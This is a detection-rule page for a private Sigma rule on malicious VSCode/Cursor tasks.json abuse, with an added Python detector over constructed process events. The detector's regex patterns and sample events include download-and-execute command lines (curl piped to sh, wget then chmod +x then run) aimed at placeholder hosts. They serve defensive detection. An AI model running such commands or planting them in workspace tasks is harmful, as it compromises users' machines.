Rule Info
Name
Suspicious Download and Execution Pattern via VSCode/Cursor Tasks - Linux
Author
Swachchhanda Shrawan Poudel (Nextron Systems)
Description
Detects suspicious patterns where Visual Studio Code or Cursor spawns processes that both download and execute files, which may indicate abuse of the `tasks.json` configuration for malicious purposes.
This technique has been observed in campaigns such as "Contagious Interview," where adversaries leverage VSCode's workspace trust model to execute arbitrary code by embedding malicious commands in `tasks.json`.
Attackers may craft or alter `tasks.json` to automatically trigger downloads and execution of payloads when a user opens and trusts a workspace in VSCode or Cursor, enabling initial access or further compromise.
Date
2026-04-02 00:00:00
Modified
None
Id
642774a1-60d4-4fc0-adde-5902a2a6225d
Tags
attack.execution attack.t1059.004 attack.defense-evasion attack.t1218
Type
Nextron Sigma feed only (private)
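The behaviour in the description, a VSCode/Cursor-spawned process that both downloads and executes, is shown below as an added example over constructed process-creation events. It is not the Nextron rule, whose logic is private; the event field names, editor process names and patterns are assumptions.

```python
import re

# Assumption: editor process names as seen in Linux process-creation telemetry.
EDITOR_PARENTS = {"code", "code-insiders", "cursor"}
# A download utility appears in the command line...
DOWNLOAD = re.compile(r"\b(curl|wget)\b")
# ...together with execution of what was fetched: a pipe into an interpreter,
# or marking a file executable.
EXECUTE = re.compile(
    r"\|\s*(sudo\s+)?(ba|z|da)?sh\b|\|\s*python3?\b|\bchmod\s+\+x\b"
)

def is_suspicious(event):
    """True when an editor-spawned process both downloads and executes."""
    parent = event["parent_image"].rsplit("/", 1)[-1].lower()
    if parent not in EDITOR_PARENTS:
        return False
    cmd = event["command_line"]
    return bool(DOWNLOAD.search(cmd) and EXECUTE.search(cmd))

def detect(events):
    """Return the ids of events matching the download-and-execute pattern."""
    return [e["id"] for e in events if is_suspicious(e)]

# Constructed sample events (hypothetical field names, placeholder URLs).
SAMPLE_EVENTS = [
    {"id": 1, "parent_image": "/usr/share/code/code",
     "command_line": "/bin/bash -c curl -s https://example.invalid/setup.sh | sh"},
    {"id": 2, "parent_image": "/usr/share/code/code",
     "command_line": "/bin/bash -c npm run build"},
    # Same command typed in an ordinary terminal: parent is not the editor.
    {"id": 3, "parent_image": "/usr/bin/bash",
     "command_line": "curl -s https://example.invalid/setup.sh | sh"},
    {"id": 4, "parent_image": "/opt/cursor/cursor",
     "command_line": "/bin/sh -c wget -q https://example.invalid/a -O /tmp/a"
                     " && chmod +x /tmp/a && /tmp/a"},
    # Download only, nothing executed.
    {"id": 5, "parent_image": "/usr/share/code/code",
     "command_line": "/bin/bash -c curl -sS https://example.invalid/health"},
]

if __name__ == "__main__":
    print(detect(SAMPLE_EVENTS))
```

Legitimate build tasks that fetch and run installers will also match, so a deployment would need an allowlist of known task command lines.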
